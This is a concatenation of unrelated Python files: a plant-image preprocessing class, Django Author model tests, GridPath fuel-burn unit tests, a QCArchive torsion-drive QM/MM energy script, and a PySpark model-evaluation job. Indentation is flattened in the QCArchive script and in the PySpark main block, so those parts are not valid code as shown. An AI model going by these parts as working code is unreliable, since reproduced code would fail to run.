        # (N, 224, 224, 4) -> (N, 4, 224, 224) channel-first layout.
        self.data_dict['image'] = np.array(self.data_dict['image']).swapaxes(1, 3)
        self.data_dict['label'] = np.array([CLASS[i] for i in self.data_dict['label']])
        logging.debug(self.data_dict['label'].shape)
        logging.debug(self.data_dict['image'].shape)
        return self.data_dict

    def read_image_simple(self, size=299, transform=None):
        """Read the training set as plain resized BGR images, converted
        with ``transform`` (required, e.g. torchvision transforms) and
        stacked into a torch tensor."""
        for class_folder in os.listdir(self.train_folder):
            class_path = os.path.join(self.train_folder, class_folder)
            for image_path in glob.glob(os.path.join(class_path, '*.png')):
                image = cv2.imread(image_path, cv2.IMREAD_COLOR)
                image = cv2.resize(image, (size, size))
                self.data_dict['image'].append(transform(image))
                self.data_dict['label'].append(class_folder)
        self.data_dict['image'] = torch.stack(self.data_dict['image'], dim=0)
        self.data_dict['label'] = torch.from_numpy(
            np.array([CLASS[i] for i in self.data_dict['label']]))
        return self.data_dict

    def plot_image(self):
        """Show raw / resized / processed versions of one sample image."""
        for class_folder in os.listdir(self.train_folder):
            class_path = os.path.join(self.train_folder, class_folder)
            for image_path in glob.glob(os.path.join(class_path, '*.png')):
                image = cv2.imread(image_path, cv2.IMREAD_COLOR)
                plt.imshow(image)
                plt.title('Raw image')
                plt.show()
                image = cv2.resize(image, (256, 256))
                plt.imshow(image)
                plt.title('Reshaped image')
                plt.show()
                image_stack = self.segment_plant(image)
                image_stack = self.sharpen_image(image_stack)
                image_stack = cv2.cvtColor(image_stack, cv2.COLOR_RGB2GRAY)
                plt.imshow(np.reshape(image_stack, (256, 256)))
                plt.title('Processed image')
                plt.show()
                # Only the first image of the first class is plotted.
                break
            break

    def read_data_mini(self):
        """Read at most 10 images per class: a quick smoke-test dataset
        in the same (N, 4, 224, 224) layout as read_image()."""
        for class_folder in os.listdir(self.train_folder):
            class_path = os.path.join(self.train_folder, class_folder)
            for count, image_path in enumerate(
                    glob.glob(os.path.join(class_path, '*.png'))):
                if count > 9:
                    break
                image = cv2.imread(image_path, cv2.IMREAD_COLOR)
                self.data_dict['image'].append(self._stacked_input(image))
                self.data_dict['label'].append(class_folder)
        self.data_dict['image'] = np.array(self.data_dict['image']).swapaxes(1, 3)
        self.data_dict['label'] = np.array([CLASS[i] for i in self.data_dict['label']])
        logging.debug(self.data_dict['label'].shape)
        logging.debug(self.data_dict['image'].shape)
        print('minidataset generated:', self.data_dict['label'].shape)
        return self.data_dict

    def test_data_read(self):
        """Read the test set with the extra segmentation channel."""
        for image_path in glob.glob(os.path.join(self.test_folder, '*.png')):
            image = cv2.imread(image_path, cv2.IMREAD_COLOR)
            self.test_dict['image'].append(self._stacked_input(image))
            # The file name (after the last backslash) is the sample id.
            self.test_dict['id'].append(image_path.split('\\')[-1])
        self.test_dict['image'] = np.array(self.test_dict['image']).swapaxes(1, 3)
        print('predictset generated:', self.test_dict['image'].shape)
        return self.test_dict

    def test_data_read_simple(self, size=299):
        """Read the test set as plain resized BGR arrays."""
        for image_path in glob.glob(os.path.join(self.test_folder, '*.png')):
            image = cv2.imread(image_path, cv2.IMREAD_COLOR)
            self.test_dict['image'].append(cv2.resize(image, (size, size)))
            self.test_dict['id'].append(image_path.split('\\')[-1])
        self.test_dict['image'] = np.array(self.test_dict['image']).swapaxes(1, 3)
        print('predictset generated:', self.test_dict['image'].shape)
        return self.test_dict

    def test_data_read_simple2(self, size=299, transform=None):
        """Read the test set resized and converted with ``transform``
        (required), stacked into a torch tensor."""
        for image_path in glob.glob(os.path.join(self.test_folder, '*.png')):
            image = cv2.imread(image_path, cv2.IMREAD_COLOR)
            image = cv2.resize(image, (size, size))
            self.test_dict['image'].append(transform(image))
            self.test_dict['id'].append(image_path.split('\\')[-1])
        self.test_dict['image'] = torch.stack(self.test_dict['image'], dim=0)
        print('predictset generated:', self.test_dict['image'].size())
        return self.test_dict

    def read_image_single(self, image_path):
        """Read one image as a (1, 4, 224, 224) prediction input."""
        image = cv2.imread(image_path, cv2.IMREAD_COLOR)
        return np.array([self._stacked_input(image)]).swapaxes(1, 3)
if __name__ == '__main__':
    preprocessing = Preprocessing()
    #preprocessing.test_data_read()
    #data = preprocessing.read_image()
    # Convert to a CHW float tensor, then normalize each channel from
    # [0, 1] to [-1, 1].
    transform2 = transforms.Compose([
        transforms.ToTensor(),
        transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))
    ]
    )
    preprocessing.test_data_read_simple2(transform=transform2)
|
<reponame>9sneha-n/pari
from django.contrib.auth.models import User
from django.test import TestCase, Client
from django.db import DataError, IntegrityError
from author.forms import AuthorAdminForm
from author.models import Author
from functional_tests.factory import AuthorFactory
class AuthorModelTests(TestCase):
    """String representation and slug-generation behaviour of Author."""

    def test_author_string_representaion(self):
        # NOTE(review): '<NAME>' looks like a redacted fixture value;
        # presumably the AuthorFactory default name — confirm against the
        # factory definition.
        assert str(AuthorFactory()) == '<NAME>'

    def test_author_slug_for_multiple_unique_author_name(self):
        # Three authors whose names differ only by trailing whitespace /
        # punctuation must get distinct slugs: the slug is truncated to
        # 50 chars and deduplicated with a numeric suffix.
        author_name = 'Author Name Author Name Author Name Author Name Author Name'
        author1 = Author(name=author_name)
        author2 = Author(name=author_name + ' ')
        author3 = Author(name=author_name + '. ')
        author1.save()
        author2.save()
        author3.save()
        assert Author.objects.get(name=author_name).slug == 'author-name-author-name-author-name-author-name-au'
        assert Author.objects.get(name=author_name + ' ').slug == 'author-name-author-name-author-name-author-name-a1'
        assert Author.objects.get(name=author_name + '. ').slug == 'author-name-author-name-author-name-author-name-a2'
class AuthorModelsExceptionTest(TestCase):
    """Database-level constraint checks on the Author model."""

    def test_should_throw_error_if_author_name_exceeds_hundred_characters(self):
        # Name exceeds the 100-character column limit. (Dropped the stray
        # trailing semicolon of the original.)
        author_name = 'Full Metal Havok More Sexy N Intelligent Than Spock And All The Superheroes Combined With Frostnova nova'
        author_with_long_name = Author(name=author_name)
        # The unused `as context_message` bindings were removed.
        with self.assertRaises(DataError):
            author_with_long_name.save()

    def test_should_throw_error_if_author_already_exist(self):
        author_one = Author(name='some author')
        author_two = Author(name='some author')
        # `name` is unique, so saving a duplicate must fail.
        with self.assertRaises(IntegrityError):
            author_one.save()
            author_two.save()

    def test_should_throw_error_if_facebook_and_twitter_name__of_author_exceeds_fifty_characters(self):
        # Both usernames exceed the 50-character column limit.
        with self.assertRaises(DataError):
            AuthorFactory(name='some author',
                          twitter_username='JAMIEREDGATE:OggtheCleverFullMetalHavokMoreKnowledgeNIntelligentThanSpockAndAll')
            AuthorFactory(name='some good author',
                          facebook_username='JAMIEREDGATE:OggtheCleverFullMetalHavokMoreKnowledgeNIntelligentThanSpockAndAll')
class AuthorAdminFormTest(TestCase):
    """Checks on the fields exposed by AuthorAdminForm."""

    def test_author_form_should_not_have_fields_image_and_slug(self):
        author_form = AuthorAdminForm()
        # assertNotIn gives a clearer failure message than
        # assertEqual(<membership test>, False).
        self.assertNotIn('image', author_form.fields,
                         msg="AuthorAdminForm should not contain field image")
        self.assertNotIn('slug', author_form.fields,
                         msg="AuthorAdminForm should not contain field slug")

    def test_author_form_should_be_in_valid_if_mandatory_fields_are_empty(self):
        author_form = AuthorAdminForm()
        # An unbound form with required fields must not validate.
        self.assertFalse(author_form.is_valid())
class AuthorViewsTest(TestCase):
    """Admin-view behaviour for adding authors/translators/photographers."""

    def setUp(self):
        self.client = Client()
        # NOTE(review): '<EMAIL>'/'<PASSWORD>' below look like redacted
        # fixture values; confirm the real credentials in the repo history.
        User.objects.create_superuser('pari', '<EMAIL>', "pari")

    def test_should_allow_only_authorized_user_to_add_author(self):
        response = self.client.post('/admin/authors/add/', content_type="application/json", data="{'name':'cool'}")
        self.assertEqual(response.status_code, 302)
        # assertRegex replaces assertRegexpMatches, which was deprecated
        # and removed in Python 3.12.
        self.assertRegex(response.url, '/admin/login',
                         msg="Unauthorized users should be redirected to login page")

    def test_should_save_author_for_valid_form_data(self):
        self.login_admin()
        data = 'name=cool'
        response = self.client.post('/admin/authors/add/', data=data,
                                    content_type='application/x-www-form-urlencoded')
        self.assertEqual(response.status_code, 200)
        author_from_db = Author.objects.get(slug='cool')
        self.assertEqual(author_from_db.name, 'cool')

    def test_should_add_translator_or_photographers_redirect_to_add_author_form(self):
        self.login_admin()
        response_for_add_translator = self.client.get('/admin/translators/add/')
        self.assertEqual(response_for_add_translator.status_code, 302)
        self.assertRegex(response_for_add_translator.url, "/admin/authors/add/", msg="Add translators should redirect to add author")
        response_for_add_photgraphers = self.client.get('/admin/photographers/add/')
        self.assertEqual(response_for_add_photgraphers.status_code, 302)
        self.assertRegex(response_for_add_photgraphers.url, "/admin/authors/add/", msg="Add translators should redirect to add author")

    def login_admin(self):
        self.client.login(username="pari", password="<PASSWORD>")
|
# Copyright 2016-2022 Blue Marble Analytics LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from builtins import str
from importlib import import_module
import os.path
import sys
import unittest
from tests.common_functions import create_abstract_model, add_components_and_load_data
# Shared test-data directory, relative to this test module.
TEST_DATA_DIRECTORY = os.path.join(
    os.path.dirname(__file__), "..", "..", "..", "test_data"
)

# Import prerequisite modules
PREREQUISITE_MODULE_NAMES = [
    "temporal.operations.timepoints",
    "temporal.operations.horizons",
    "temporal.investment.periods",
    "geography.load_zones",
    "geography.fuel_burn_limit_balancing_areas",
    "system.policy.fuel_burn_limits.fuel_burn_limits",
    "project",
    "project.capacity.capacity",
    "project.availability.availability",
    "project.fuels",
    "project.operations",
    "project.operations.operational_types",
    "project.operations.power",
    "project.operations.fuel_burn",
]
NAME_OF_MODULE_BEING_TESTED = (
    "system.policy.fuel_burn_limits.aggregate_project_fuel_burn"
)
IMPORTED_PREREQ_MODULES = list()
for mdl in PREREQUISITE_MODULE_NAMES:
    try:
        imported_module = import_module("." + str(mdl), package="gridpath")
        IMPORTED_PREREQ_MODULES.append(imported_module)
    except ImportError:
        print("ERROR! Module " + str(mdl) + " not found.")
        sys.exit(1)

# Import the module we'll test
try:
    MODULE_BEING_TESTED = import_module(
        "." + NAME_OF_MODULE_BEING_TESTED, package="gridpath"
    )
except ImportError:
    print("ERROR! Couldn't import module " + NAME_OF_MODULE_BEING_TESTED + " to test.")
    # Exit here, mirroring the prerequisite loop above; without this,
    # MODULE_BEING_TESTED would be undefined and the tests would fail
    # with a confusing NameError instead.
    sys.exit(1)
class TestAggregateProjectFuelBurn(unittest.TestCase):
    """Unit tests for the aggregate_project_fuel_burn module: model
    construction, data loading, and the loaded set contents."""

    def test_add_model_components(self):
        """
        Test that there are no errors when adding model components
        :return:
        """
        create_abstract_model(
            prereq_modules=IMPORTED_PREREQ_MODULES,
            module_to_test=MODULE_BEING_TESTED,
            test_data_dir=TEST_DATA_DIRECTORY,
            subproblem="",
            stage="",
        )

    def test_load_model_data(self):
        """
        Test that data are loaded with no errors
        :return:
        """
        add_components_and_load_data(
            prereq_modules=IMPORTED_PREREQ_MODULES,
            module_to_test=MODULE_BEING_TESTED,
            test_data_dir=TEST_DATA_DIRECTORY,
            subproblem="",
            stage="",
        )

    def test_data_loaded_correctly(self):
        """
        Test components initialized with data as expected
        :return:
        """
        m, data = add_components_and_load_data(
            prereq_modules=IMPORTED_PREREQ_MODULES,
            module_to_test=MODULE_BEING_TESTED,
            test_data_dir=TEST_DATA_DIRECTORY,
            subproblem="",
            stage="",
        )
        instance = m.create_instance(data)
        # Set: PRJ_FUEL_BURN_LIMIT_BAS
        # (project, fuel, balancing area) triples; sorted for a
        # deterministic comparison.
        expected_prj_fuel_ba = sorted(
            [
                ("Gas_CCGT", "Gas", "Zone1"),
                ("Coal", "Coal", "Zone1"),
                ("Gas_CT", "Gas", "Zone1"),
                ("Gas_CCGT_New", "Gas", "Zone1"),
                ("Gas_CCGT_New_Binary", "Gas", "Zone1"),
                ("Gas_CT_New", "Gas", "Zone1"),
                ("Coal_z2", "Coal", "Zone2"),
            ]
        )
        actual_prj_fuel_ba = sorted(
            [(prj, f, ba) for (prj, f, ba) in instance.PRJ_FUEL_BURN_LIMIT_BAS]
        )
        self.assertListEqual(expected_prj_fuel_ba, actual_prj_fuel_ba)
        # Set: PRJ_FUELS_WITH_LIMITS
        # (project, fuel) pairs with a fuel-burn limit.
        expected_prj_fuel_w_limits = sorted(
            [
                ("Gas_CCGT", "Gas"),
                ("Coal", "Coal"),
                ("Gas_CT", "Gas"),
                ("Gas_CCGT_New", "Gas"),
                ("Gas_CCGT_New_Binary", "Gas"),
                ("Gas_CT_New", "Gas"),
                ("Coal_z2", "Coal"),
            ]
        )
        actual_prj_fuel_w_limits = sorted(
            [(prj, f) for (prj, f) in instance.PRJ_FUELS_WITH_LIMITS]
        )
        self.assertListEqual(expected_prj_fuel_w_limits, actual_prj_fuel_w_limits)
        # Set: PRJS_BY_FUEL_BA
        # Indexed set: projects per (fuel, balancing area); may be empty.
        expected_prj_by_fuel_ba = {
            ("Gas", "Zone1"): sorted(
                [
                    "Gas_CCGT",
                    "Gas_CT",
                    "Gas_CCGT_New",
                    "Gas_CCGT_New_Binary",
                    "Gas_CT_New",
                ]
            ),
            ("Coal", "Zone1"): sorted(["Coal"]),
            ("Coal", "Zone2"): sorted(["Coal_z2"]),
            ("Nuclear", "Zone1"): sorted([]),
        }
        actual_prj_by_fuel_ba = {
            (f, ba): sorted([prj for prj in instance.PRJS_BY_FUEL_BA[f, ba]])
            for (f, ba) in instance.PRJS_BY_FUEL_BA
        }
        self.assertDictEqual(expected_prj_by_fuel_ba, actual_prj_by_fuel_ba)
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
<gh_stars>1-10
import json
import os
import pickle
import offsb.qcarchive
import offsb.qcarchive.qcatree as qca
import offsb.rdutil.mol
import offsb.tools.const
import qcfractal.interface as ptl
import simtk.openmm.openmm
import simtk.unit
from offsb.op import geometry, openforcefield, openmm
from offsb.search import smiles
# The openff forcefield version to use for calculations below
version: str = "1.2.0"
# The unique identifier for this job.
# We are going to do an OpenMM minimization on the TD, so lets call this opt
name: str = "opt"
def _dihedral_matched(group_smi_list, indices, dihedral):
    """Return True if any SMARTS match in ``group_smi_list`` selects
    ``dihedral`` when reduced to the 1-indexed ``indices``.

    Replaces the nested ``found``-flag loops of the original.
    """
    for pattern, matches in group_smi_list.items():
        for match in matches:
            # The supplied indices are 1-indexed, since they are coupled
            # to the CMILES map e.g. [*:2][*:1][*:3]
            candidate = tuple(match[i - 1] for i in indices)
            # Normalize direction so (a, b) and (b, a) compare equal.
            if candidate[-1] < candidate[0]:
                candidate = candidate[::-1]
            if candidate == dihedral:
                return True
    return False


def match_td_smiles(QCA, smitree, indices):
    """
    From a SMARTS search, pull out the torsiondrives that match
    Parameters
    ----------
    QCA : offsb.qcarchive.qcatree.QCATree
        The object holding the index and data of QCArchive objects
    smitree : offsb.op.smiles.SmilesSearchTree
        The object that performed the SMARTS searching on the QCA object
    indices : List[int]
        A 1-index list of indices used to determine the match. If a mapped
        SMARTS pattern was used and the exact pattern is desired, set this
        to [1,2,3,4]. If any torsiondrive matching the inner rotatable bond
        is desired, set this to [2,3], indicating that only the inner indices
        must match.
    Returns
    -------
    match_entries : List[offsb.treedi.node.Node]
        A list of nodes corresponding to QCArchive TDEntry objects
    """
    match_entries = list()
    for node in QCA.node_iter_depth_first(QCA.root(), select="Entry"):
        if node.payload not in smitree.db:
            continue
        # These are the indices of everything that matched in the smiles
        # operation.
        group_smi_list = smitree.db[node.payload]["data"]
        CIEHMS = "canonical_isomeric_explicit_hydrogen_mapped_smiles"
        # The original reused the name `smi` for both this SMILES string
        # and the per-match index tuples; renamed for clarity.
        mapped_smiles = QCA.db[node.payload]["data"].attributes[CIEHMS]
        mol = offsb.rdutil.mol.build_from_smiles(mapped_smiles)
        map_idx = offsb.rdutil.mol.atom_map(mol)
        map_inv = {v - 1: k for k, v in map_idx.items()}
        dihedral = QCA.db[node.payload]["data"].td_keywords.dihedrals[0]
        # Try to detect the special case where we want the rotatable bond
        if len(indices) == 2:
            dihedral = tuple(dihedral[1:3])
        elif len(indices) != 4:
            raise Exception(
                "Only able to search a torsiondrive with 4 indices. If two indices are given, we assume it is the inner rotatable bond"
            )
        # Map into molecule atom order and normalize the direction.
        dihedral = tuple(map_inv[i] for i in dihedral)
        if dihedral[-1] < dihedral[0]:
            dihedral = dihedral[::-1]
        if _dihedral_matched(group_smi_list, indices, dihedral):
            match_entries.append(node)
    return match_entries
def save(tree):
    """Pickle *tree* (including its db) to ./<tree.name>.p and report the file size."""
    out_path = os.path.join(".", tree.name + ".p")
    print("Saving: ", tree.ID, "as", out_path, end=" ... ")
    tree.to_pickle(db=True, name=out_path)
    size_mb = os.path.getsize(out_path) / 1024 ** 2
    print("{:12.1f} MB".format(size_mb))
if False:
# TODO: needs work still as ui can't be imported
# Load a list of datasets and build the index
# "datasets" is a file of datasets to load
datasets = offsb.ui.qcasb.load_dataset_input("datasets")
QCA = offsb.ui.qcasb.QCArchiveSpellBook(datasets=datasets).QCA
else:
# Just a quick shortcut to get something going
client = ptl.FractalClient()
ds = client.get_collection(
"TorsionDriveDataset", "OpenFF Gen 2 Torsion Set 1 Roche"
)
QCA = QCA = qca.QCATree("QCA", root_payload=client, node_index=dict(), db=dict())
drop = ["Intermediates", "Hessian"]
QCA.build_index(ds, drop=drop, keep_specs=["default"])
save(QCA)
entries = list(QCA.node_iter_depth_first(QCA.root(), select="Entry"))
print("There are {:d} entries total".format(len(entries)))
# The general query on the dataset.
# The results respect the key, and will only return those indices if specified
# If no key is specified, then the indices are in order as they appear in the string
query = smiles.SmilesSearchTree(
"[#7X3:2](~[#1:1])(~[#6])~[#6:3]=[O:4]", QCA, name="smiles"
)
query.apply(targets=entries)
# Choose which entries to analyze: either only TDs whose driven torsion
# matches the SMARTS query (True branch) or every entry the query hit.
if True:
# This is the torsion drive we are looking for
# For whatever reason, the mapped indices are not respected, so need the map
#
# It is possible to select just a subset of the above search.
# For example matching [2,3] will match any torsiondrive with the same
# rotatable bond
#
# This is 1-indexing
#
# This will search for the exact torsion specified above
# tmap = [1, 2, 3, 4]
# This will search for *any* torsion that was driven which matches the
# rotatable bond found in the above search. Useful when we found the pattern,
# but a slightly different torsion was driven (but on the same bond)
tmap = [2, 3]
# Use this to only focus on the TDs that match the query
entries = match_td_smiles(QCA, query, tmap)
else:
# This will retrieve all entries that matched the query
# First, pull the entries that the SMARTS matcher recorded
keys = [n for n in query.db if len(query.db[n]["data"]) > 0]
# Then pull those entries from the dataset
entries = [e for e in entries if e.payload in keys]
print("There are {:d} entries that match".format(len(entries)))
# Download the optimized geometries of the entries of interest
# If torsiondrives, this will download all optimization results
# QCA.cache_optimization_minimum_molecules(nodes=entries)
# This downloads just the "best" optimization per angle for TDs
QCA.cache_torsiondriverecord_minimum_molecules(nodes=entries)
# Save for use later with the newly cached molecules
save(QCA)
###############################################################################
# Perform an OpenMM Energy evaluation
# NOTE(review): `name` and `version` are defined earlier in this file
# (outside this chunk) — presumably the force-field name/version strings.
oMM_name = "oFF-" + name + "-" + version
# Reuse a previous run's pickle if present; otherwise compute from scratch.
if os.path.exists(oMM_name + ".p"):
with open(oMM_name + ".p", "rb") as fid:
oMM = pickle.load(fid)
else:
# Calculate MM energies of the TD snapshots
oMM = openmm.OpenMMEnergy(
"openff_unconstrained-" + version + ".offxml", QCA, oMM_name
)
# Minimize starting from the TD optimized geometries (set False to skip).
oMM.minimize = True
oMM.processes = 8
# Whether to use geometric for the minimization (True), or the native OpenMM minimizer (False)
oMM.use_geometric = False
# This will also add the same constraints used in the TD optimizations
# Turn this and minimization on if you want the MM-minimized TD
oMM.constrain = True
# Perform the calculation; this could take some time depending on the number
# of entries
oMM.apply(targets=entries)
save(oMM)
###############################################################################
# Apply the force field labeler (assigns e.g. ProperTorsions parameter labels)
oFF_name = "labels-" + name + "-" + version
# Reuse a previous run's pickle if present; otherwise label from scratch.
if os.path.exists(oFF_name + ".p"):
with open(oFF_name + ".p", "rb") as fid:
oFF = pickle.load(fid)
else:
oFF = openforcefield.OpenForceFieldTree(
QCA,
oFF_name,
"openff_unconstrained-" + version + ".offxml",
)
oFF.apply(targets=entries)
save(oFF)
# This is the regular output (human readable, closed at the end of the script)
fid = open("test" + name + version + ".dat", "w")
# This is raw data with just numbers
fid2 = open("test" + name + version, "w")
# Alias: the SMARTS search results drive which entries/torsions are reported.
smidb = query
# Now go through the QM, MM, and SMARTS data and aggregate
for entry_nr, entry in enumerate(entries):
if entry.payload not in smidb.db:
# Shouldn't happen, but check just in case
print("This entry not in the SMARTS match list")
continue
idx = smidb.db[entry.payload]["data"]
if idx == []:
# Probably also shouldn't happen..
print("Not a match")
continue
###########################################################################
# Need to recompute the QCA dihedral map -> CMILES for labeler mapping
CIEHMS = "canonical_isomeric_explicit_hydrogen_mapped_smiles"
smi = QCA.db[entry.payload]["data"].attributes[CIEHMS]
mmol = offsb.rdutil.mol.build_from_smiles(smi)
map_idx = offsb.rdutil.mol.atom_map(mmol)
# This inverse map takes QCA indices and sends to CMILES indices
map_inv = {v - 1: k for k, v in map_idx.items()}
###########################################################################
molecules = list(QCA.node_iter_depth_first(entry, select="Molecule"))
qmenes = {}
mmenes = {}
min_id = None
qmmin = None
mmmin = None
molecules_with_angle = []
# First pass through the molecules to get the minimum energy for
# calculating a reference, and getting the constraint angles for sorting
for molecule_node in molecules:
if molecule_node.payload not in oMM.db:
print("case 1")
continue
molecule = oMM.db[molecule_node.payload]["data"]
if molecule == []:
print("case 2")
continue
optimization = QCA.db[
next(QCA.node_iter_to_root(molecule_node, select="Optimization")).payload
]
# NOTE(review): this indexes energies[-1] *before* the len() > 0 guard
# below — an empty energies list would raise IndexError here. Verify
# upstream guarantees non-empty energies, or move this after the guard.
ene = optimization["data"]["energies"][-1]
if (
oMM.db[molecule_node.payload]["data"]["energy"] is not None
and len(optimization["data"]["energies"]) > 0
):
# Track the lowest QM energy as the reference zero.
if qmmin is None or ene < qmmin:
qmmin = ene
min_id = molecule_node.payload
qmenes[molecule_node.payload] = ene
mmenes[molecule_node.payload] = oMM.db[molecule_node.payload]["data"][
"energy"
]
constr = []
constraints = list(QCA.node_iter_to_root(molecule_node, select="Constraint"))
if len(constraints) > 0:
constr = list(constraints[0].payload[1])
val = constraints[0].payload[2]
molecules_with_angle.append([val, molecule_node])
# MM reference energy taken at the QM-minimum geometry.
# NOTE(review): if no molecule passed the guard above, min_id stays None
# and this lookup raises — confirm at least one valid molecule per entry.
mmmin = oMM.db[min_id]["data"]["energy"]
# Re-order the molecules by their driven (constraint) angle.
molecules = sorted(molecules_with_angle, key=lambda x: x[0])
# for molecule_node in QCA.node_iter_depth_first(entry, select="Molecule"):
# Second pass: compute relative QM/MM energies per angle-sorted molecule.
for mol_nr, molecule_node in enumerate(molecules):
# Each item is [constraint_angle, node] from the first pass.
constr_val, molecule_node = molecule_node
if molecule_node.payload not in oMM.db:
continue
# This can be just an energy, or a whole new molecule if the OpenMM
# energy calculation used minimize=True
omm_result = oMM.db[molecule_node.payload]["data"]
if omm_result == []:
continue
if oMM.db[molecule_node.payload]["data"]["energy"] is None:
continue
optimization = QCA.db[
next(QCA.node_iter_to_root(molecule_node, select="Optimization")).payload
]
# Relative QM energy w.r.t. the entry minimum found in the first pass.
qene = optimization["data"]["energies"][-1] - qmmin
constr = []
constraints = list(QCA.node_iter_to_root(molecule_node, select="Constraint"))
if len(constraints) > 0:
constr = list(constraints[0].payload[1])
# Depending on what the reference spec is, this could be a plain float
# (from e.g. QM calculations) or a fancy object with units (OpenMM)
if issubclass(type(qene), simtk.unit.quantity.Quantity):
qene /= simtk.unit.kilocalories_per_mole
else:
# Assumes unitless from QCA are in au
qene *= offsb.tools.const.hartree2kcalmol
# Relative MM energy w.r.t. the MM energy at the QM-minimum geometry.
mene = oMM.db[molecule_node.payload]["data"]["energy"] - mmmin
if issubclass(type(mene), simtk.unit.quantity.Quantity):
mene /= simtk.unit.kilocalories_per_mole
qcmol = QCA.db[molecule_node.payload]["data"]
print(entry, molecule_node, end="\n")
fid.write("{:s} {:s}\n".format(entry.__repr__(), molecule_node.__repr__()))
# Only caring about 1D torsions for now
for i in [constr]:
# Get the indices of the driven torsion that will correspond to
# what CMILES-ordered molecules use (e.g. the FF labeler)
mapped_dihedral = tuple([map_inv[j] for j in i])
# Canonical direction: smaller end-atom index first.
if mapped_dihedral[0] > mapped_dihedral[-1]:
mapped_dihedral = tuple(mapped_dihedral[::-1])
print("Complete key is", i)
# Skip anything that is not a proper 4-atom torsion.
if len(i) != 4:
continue
# Optionally dump the QM-minimum (and MM-minimized, when present)
# geometries to per-torsiondrive multi-frame xyz files.
if True:
# If we want to save the molecule to disk
tdr = next(QCA.node_iter_to_root(molecule_node, select="TorsionDrive"))
# First frame truncates the file; later frames append.
mode = "w" if mol_nr == 0 else "a"
with open(
"TD-{:s}.QMMin.xyz".format(tdr.payload),
mode,
) as fd:
offsb.qcarchive.qcmol_to_xyz(
qcmol,
fd=fd,
comment=json.dumps(i)
+ str(constr_val)
+ " {:s} {:s}".format(
molecule_node.payload, molecule_node.index
),
)
# Only written when the OpenMM step produced a full minimized molecule
# (i.e. the stored payload is a qcschema_molecule, not just an energy).
if (
oMM.db[molecule_node.payload]["data"].get("schema_name", "")
== "qcschema_molecule"
):
qcmmmol = oMM.db[molecule_node.payload]["data"]
with open(
"TD-{:s}.MMMin.xyz".format(tdr.payload),
mode,
) as fd:
offsb.qcarchive.qcmol_to_xyz(
qcmmmol,
fd=fd,
comment=json.dumps(i)
+ str(constr_val)
+ "MM energy: "
+ str(oMM.db[molecule_node.payload]["data"].get("energy", None))
+ " {:s} {:s}".format(
molecule_node.payload, molecule_node.index
),
)
# Measure the driven dihedral angle on the QM geometry.
angle = geometry.TorsionOperation.measure_praxeolitic_single(
qcmol["geometry"], i
)
if "geometry" in omm_result:
# Measure the angle directly from the MM minimization (mostly to ensure everything went OK)
anglemin = geometry.TorsionOperation.measure_praxeolitic_single(
omm_result["geometry"], i
)
else:
# No minimization, so the QM and MM angles are the same
anglemin = angle
# Labels are stored at the entry level since all entry molecules have the same labels
label = oFF.db[entry.payload]["data"]["ProperTorsions"][mapped_dihedral]
out_str = "{:3d}-{:3d}-{:3d}-{:3d} TD_Angle= {:10.2f} AngleMin= {:10.2f} QM_Energy= {:10.2f} MM_Energy= {:10.2f} Label= {}\n".format(
*i, angle, anglemin, qene, mene, label
)
print(out_str, end="")
fid.write(out_str)
# This is just the data, no strings attached
fid2.write(
"{:4d} {:f} {:f} {:f} {:f}\n".format(
entry_nr, angle, anglemin, qene, mene
)
)
# Blank line between entries in the human-readable report.
print()
fid.write("\n")
fid.close()
fid2.close()
# --- end of script (stray table-delimiter artifact removed) ---
# -*- coding: utf-8 -*-
"""<EMAIL>.
功能描述:job3:left join cpa和prod
* @author yzy
* @version 0.0
* @since 2020/08/12
* @note 落盘数据:cpa_prod_join
"""
import os
from pyspark.sql import SparkSession
from dataparepare import *
from interfere import *
from pyspark.sql.types import *
from pyspark.sql.functions import desc
from pyspark.sql.functions import rank
from pyspark.sql import Window
from pyspark.ml.linalg import Vectors, VectorUDT
from pyspark.ml.classification import MultilayerPerceptronClassificationModel
from pyspark.ml.classification import DecisionTreeClassificationModel
from pyspark.ml.evaluation import MulticlassClassificationEvaluator
from pyspark.ml import PipelineModel
from pdu_feature import similarity, hit_place_prediction, dosage_replace, prod_name_replace, pack_replace
from pyspark.ml.feature import VectorAssembler
def prepare():
    """Create a YARN-backed SparkSession wired for S3A access and return it.

    Reads AWS credentials from the environment; when an access key is
    present, the Hadoop configuration is pointed at the cn-northwest-1
    S3 endpoint.
    """
    os.environ["PYSPARK_PYTHON"] = "python3"
    # Session sized for the matching job; whole-stage codegen disabled.
    spark = (
        SparkSession.builder
        .master("yarn")
        .appName("CPA&GYC match refactor")
        .config("spark.driver.memory", "1g")
        .config("spark.executor.cores", "2")
        .config("spark.executor.instances", "4")
        .config("spark.executor.memory", "2g")
        .config('spark.sql.codegen.wholeStage', False)
        .getOrCreate()
    )
    # Read data from the S3 bucket: wire credentials and endpoint when available.
    access_key = os.getenv("AWS_ACCESS_KEY_ID")
    secret_key = os.getenv("AWS_SECRET_ACCESS_KEY")
    if access_key is not None:
        hadoop_conf = spark._jsc.hadoopConfiguration()
        hadoop_conf.set("fs.s3a.access.key", access_key)
        hadoop_conf.set("fs.s3a.secret.key", secret_key)
        hadoop_conf.set("fs.s3a.impl", "org.apache.hadoop.fs.s3a.S3AFileSystem")
        hadoop_conf.set("com.amazonaws.services.s3.enableV4", "true")
        # spark._jsc.hadoopConfiguration().set("fs.s3a.aws.credentials.provider","org.apache.hadoop.fs.s3a.BasicAWSCredentialsProvider")
        hadoop_conf.set("fs.s3a.endpoint", "s3.cn-northwest-1.amazonaws.com.cn")
    return spark
if __name__ == '__main__':
# Evaluate the saved matching model, then refine matches over three rounds.
spark = prepare()
# 1. load the data
df_result = load_training_data(spark)
df_validate = df_result #.select("id", "label", "features").orderBy("id")
# 2. load model
model = PipelineModel.load("s3a://ph-max-auto/2020-08-11/BPBatchDAG/refactor/alfred/rf")
# 3. compute accuracy on the test set
predictions = model.transform(df_validate)
evaluator = MulticlassClassificationEvaluator(labelCol="indexedLabel", predictionCol="prediction", metricName="accuracy")
accuracy = evaluator.evaluate(predictions)
print("Test Error = %g " % (1.0 - accuracy))
